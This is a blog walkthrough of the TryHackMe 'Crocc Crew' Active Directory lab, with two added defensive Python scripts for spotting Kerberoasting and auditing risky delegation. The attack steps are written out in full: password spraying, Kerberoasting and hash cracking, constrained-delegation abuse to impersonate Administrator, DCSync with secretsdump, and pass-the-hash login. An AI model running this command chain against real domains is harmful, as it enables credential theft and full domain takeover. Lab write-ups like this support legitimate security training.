THM-Crocc Crew

Introduction

THM Crocc Crew

Insane

Target IP

10.48.160.160

Scanning

nmap -p- --min-rate 3000 10.48.160.160
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
9389/tcp  open  adws
49666/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown
49672/tcp open  unknown
49709/tcp open  unknown
49884/tcp open  unknown
nmap -sT -sV -sC -O -p53,80,135,139,445,464,593,636,3269,3389,9389 10.48.160.160
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.COOCTUS.CORP
| Not valid before: 2026-02-18T10:03:12
|_Not valid after:  2026-08-20T10:03:12
| rdp-ntlm-info:
|   Target_Name: COOCTUS
|   NetBIOS_Domain_Name: COOCTUS
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: COOCTUS.CORP
|   DNS_Computer_Name: DC.COOCTUS.CORP
|   Product_Version: 10.0.17763
|_  System_Time: 2026-02-19T10:13:58+00:00
|_ssl-date: 2026-02-19T10:14:37+00:00; 0s from scanner time.
9389/tcp open  mc-nmf        .NET Message Framing
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2026-02-19T10:14:01
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.11 seconds

dirsearch -u "http://10.48.160.160/"

[05:13:03] 200 -   70B  - /robots.txt
  • IP address: 10.48.160.160
  • Hostname: DC.COOCTUS.CORP
  • NetBIOS name: DC
  • Domain: COOCTUS.CORP
  • Operating system: Windows Server 2019 (Build 17763)
  • Service info: Microsoft IIS httpd 10.0
  • Directory brute force: /robots.txt

Robots

User-Agent: *
Disallow:
/robots.txt
/db-config.bak
/backdoor.php

Exposed paths

  • /backdoor.php is a fake backdoor; it cannot execute commands

  • /db-config.bak yields database credentials

    $servername = "db.cooctus.corp";
    $username = "C00ctusAdm1n";
    $password = "B4dt0th3b0n3";

RDP leak

Connecting to RDP, a set of credentials is visible on the login background

Visitor:GuestLogin!

crackmapexec smb 10.48.160.160 -u 'Visitor' -p 'GuestLogin!'

Enumeration

Users

crackmapexec smb 10.48.160.160 -u 'Visitor' -p 'GuestLogin!' --users
enum4linux -u 'Visitor' -p 'GuestLogin!' 10.48.160.160

The users collected are as follows

password-reset
David
Ben
evan
Varg
jon
kevin
pars
yumeko
cryillic
karen
Fawaz
admCroccCrew
Howard
Steve
Spooks
Jeff
mark
Visitor
krbtgt
Guest
Administrator

Password spraying

crackmapexec smb 10.48.160.160 -u users.txt -p 'GuestLogin!' --continue-on-success

All failed except Visitor

AS-REP Roasting

impacket-GetNPUsers COOCTUS.CORP/ -no-pass -usersfile users.txt

Failed

Shares

crackmapexec smb 10.48.160.160 -u 'Visitor' -p 'GuestLogin!' --shares

SMB         10.48.160.160   445    DC               Share           Permissions     Remark
SMB         10.48.160.160   445    DC               -----           -----------     ------
SMB         10.48.160.160   445    DC               ADMIN$                          Remote Admin
SMB         10.48.160.160   445    DC               C$                              Default share
SMB         10.48.160.160   445    DC               Home            READ
SMB         10.48.160.160   445    DC               IPC$            READ            Remote IPC
SMB         10.48.160.160   445    DC               NETLOGON        READ            Logon server share
SMB         10.48.160.160   445    DC               SYSVOL          READ            Logon server share

Inspect the shares

# Connect to the Home share
smbclient //10.48.160.160/Home -U 'COOCTUS.CORP/Visitor%GuestLogin!'

# Connect to NETLOGON
smbclient //10.48.160.160/NETLOGON -U 'COOCTUS.CORP/Visitor%GuestLogin!'

# Connect to SYSVOL
smbclient //10.48.160.160/SYSVOL -U 'COOCTUS.CORP/Visitor%GuestLogin!'

  • The first flag, user.txt, is found in the Home share

Kerberoasting

Request service tickets for SPNs

impacket-getTGT COOCTUS.CORP/Visitor:'GuestLogin!'  # obtain a TGT
export KRB5CCNAME=Visitor.ccache                     # point at the ticket cache
impacket-GetUserSPNs -request -dc-ip 10.48.160.160 -k -no-pass  # authenticate with Kerberos

Cracking

hashcat -m 13100 kerberoasting.hashes /usr/share/wordlists/rockyou.txt

New credentials obtained

password-reset:resetpassword
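The ticket cracked above was issued with RC4-HMAC, which is what makes an offline dictionary attack against a short password like resetpassword practical. As an added example that is not from the original writeup, the Python below triages constructed 4769 (Kerberos service ticket request) records and flags successfully issued RC4 tickets for non-machine service accounts, grouped by requester, so that one principal pulling tickets for several SPNs stands out; the account names svc_backup and svc_sql and the client addresses are invented. The corresponding hardening is AES-only encryption types plus long random passwords (or gMSAs) for every SPN-bearing account.

```python
"""Flag Kerberoast-style service-ticket requests in Windows event 4769.

Added example, not part of the original writeup; events are constructed.
Kerberoasting requests TGS tickets for accounts that carry an SPN, and the
classic indicator is a ticket encrypted with RC4-HMAC (TicketEncryptionType
0x17) for a user account rather than a machine account ending in '$'.
"""
from collections import defaultdict

RC4_HMAC = "0x17"   # etype 23; AES types are 0x11 (AES128) and 0x12 (AES256)

SAMPLE_EVENTS = [
    # Normal: a user fetching an AES ticket for the DC's machine account.
    {"EventID": 4769, "TargetUserName": "ben@COOCTUS.CORP",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:10.48.160.21", "Status": "0x0"},
    # Suspicious: Visitor requesting RC4 tickets for user service accounts.
    {"EventID": 4769, "TargetUserName": "Visitor@COOCTUS.CORP",
     "ServiceName": "password-reset", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.48.160.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "Visitor@COOCTUS.CORP",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.48.160.50", "Status": "0x0"},
    # Failed request (non-zero Status): no ticket was issued, so nothing to crack.
    {"EventID": 4769, "TargetUserName": "Visitor@COOCTUS.CORP",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.48.160.50", "Status": "0x1b"},
]


def is_roastable_request(ev):
    """True if this 4769 describes a successfully issued RC4 ticket for a
    non-machine service account, i.e. a ticket that can be cracked offline."""
    service = ev.get("ServiceName", "")
    return (ev.get("EventID") == 4769
            and ev.get("Status") == "0x0"
            and ev.get("TicketEncryptionType") == RC4_HMAC
            and not service.endswith("$")
            and service != "krbtgt")


def kerberoast_candidates(events):
    """Group suspicious requests by (requesting user, client address) and
    return the sorted list of service accounts each requester targeted."""
    grouped = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            grouped[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {key: sorted(services) for key, services in grouped.items()}


if __name__ == "__main__":
    for (user, addr), services in kerberoast_candidates(SAMPLE_EVENTS).items():
        print(f"{user} from {addr} requested RC4 tickets for: {', '.join(services)}")
```

Once service accounts are AES-only, any remaining 0x17 request for a user SPN is a strong signal on its own; until then, the grouping by requester is what separates a roast from ordinary RC4 traffic.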

BloodHound

bloodhound-python -d COOCTUS.CORP -u 'password-reset' -p 'resetpassword' -ns 10.48.160.160 -c all

Upload the data to BloodHound

Looking at password-reset's rights, it can reset the passwords of many users, but not Administrator

password-reset also has delegation rights to the DC

Constrained delegation

The target was restarted; its new IP is 10.48.189.67

Query

impacket-findDelegation cooctus.corp/password-reset:resetpassword -dc-ip 10.48.189.67

password-reset has constrained delegation

  • password-reset can access the oakley service on behalf of any user
  • Protocol transition is enabled (it can convert from non-Kerberos authentication)
  • It can therefore obtain tickets for arbitrary users (including domain administrators) to oakley
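What findDelegation reports can be audited straight from the account attributes: msDS-AllowedToDelegateTo lists the target services, and the TRUSTED_TO_AUTH_FOR_DELEGATION bit (0x1000000) in userAccountControl is what enables protocol transition. The Python below is an added example, not part of the original writeup. It takes constructed records shaped like LDAP results (svc_web and FS01.COOCTUS.CORP are invented), rates delegation to a tier-0 host with protocol transition as critical, and also reports privileged accounts that are not marked "sensitive and cannot be delegated", the setting that would have prevented a ticket for Administrator being obtained this way.

```python
"""Audit Active Directory accounts for risky constrained delegation.

Added example, not part of the original writeup. The records below are
constructed to look like LDAP search results for the attributes involved;
svc_web and FS01.COOCTUS.CORP are invented. A real run would feed the results
of an LDAP search such as (msDS-AllowedToDelegateTo=*) into audit_delegation().
"""
# userAccountControl bits relevant to delegation (well-known AD values).
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition ("use any authentication protocol")
NORMAL_ACCOUNT = 0x200

SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "password-reset",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["oakley/DC.COOCTUS.CORP", "oakley/DC"]},
    # Constructed: Kerberos-only delegation to a non-tier-0 file server.
    {"sAMAccountName": "svc_web",
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["cifs/FS01.COOCTUS.CORP"]},
    {"sAMAccountName": "Administrator",
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
]

TIER0_HOSTS = {"DC", "DC.COOCTUS.CORP"}


def spn_host(spn):
    """Upper-cased host part of 'service/host[:port]'; None if malformed."""
    if "/" not in spn:
        return None
    return spn.split("/", 1)[1].split(":", 1)[0].upper()


def audit_delegation(accounts, tier0_hosts=TIER0_HOSTS, privileged=("Administrator",)):
    """Return a list of (account, severity, detail) findings."""
    findings = []
    tier0 = {h.upper() for h in tier0_hosts}
    for acct in accounts:
        name = acct["sAMAccountName"]
        uac = acct["userAccountControl"]
        targets = acct.get("msDS-AllowedToDelegateTo") or []

        if uac & TRUSTED_FOR_DELEGATION:
            findings.append((name, "critical", "unconstrained delegation enabled"))

        if targets:
            protocol_transition = bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION)
            hits_tier0 = any(spn_host(s) in tier0 for s in targets)
            # Protocol transition lets the account obtain service tickets for
            # any user without that user authenticating, so combined with a
            # tier-0 target it is a full domain compromise path.
            if protocol_transition and hits_tier0:
                severity = "critical"
            elif protocol_transition or hits_tier0:
                severity = "high"
            else:
                severity = "medium"
            findings.append((name, severity,
                             f"constrained delegation to {sorted(targets)}, "
                             f"protocol transition {'on' if protocol_transition else 'off'}"))

        # Privileged principals should carry NOT_DELEGATED (or sit in Protected
        # Users) so that S4U2Self tickets for them are not forwardable.
        if name in privileged and not uac & NOT_DELEGATED:
            findings.append((name, "high",
                             "privileged account not marked 'sensitive and cannot be delegated'"))
    return findings


if __name__ == "__main__":
    for account, severity, detail in audit_delegation(SAMPLE_ACCOUNTS):
        print(f"[{severity}] {account}: {detail}")
```

Run against real directory data, the two fixes this points at are removing or scoping password-reset's delegation and setting NOT_DELEGATED (or Protected Users membership) on Administrator; either one alone breaks the path used here.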

Obtain a service ticket (ST)

impacket-getST -dc-ip 10.48.189.67 -spn oakley/DC.COOCTUS.CORP -impersonate Administrator cooctus.corp/password-reset:resetpassword

DCSync

impacket-secretsdump -k -no-pass DC.COOCTUS.CORP

evil-winrm -i 10.48.189.67 -u Administrator -H add41095f1fb0405b32f70a489de022d

In C:\Shares\Home, two privileged-user flags are found

In C:\Perflogs\Admin, root.txt is found


http://xiaowu5.cn/2026/02/19/THM-CroccCrew/
Author
5
Published on
February 19, 2026
License
BY XIAOWU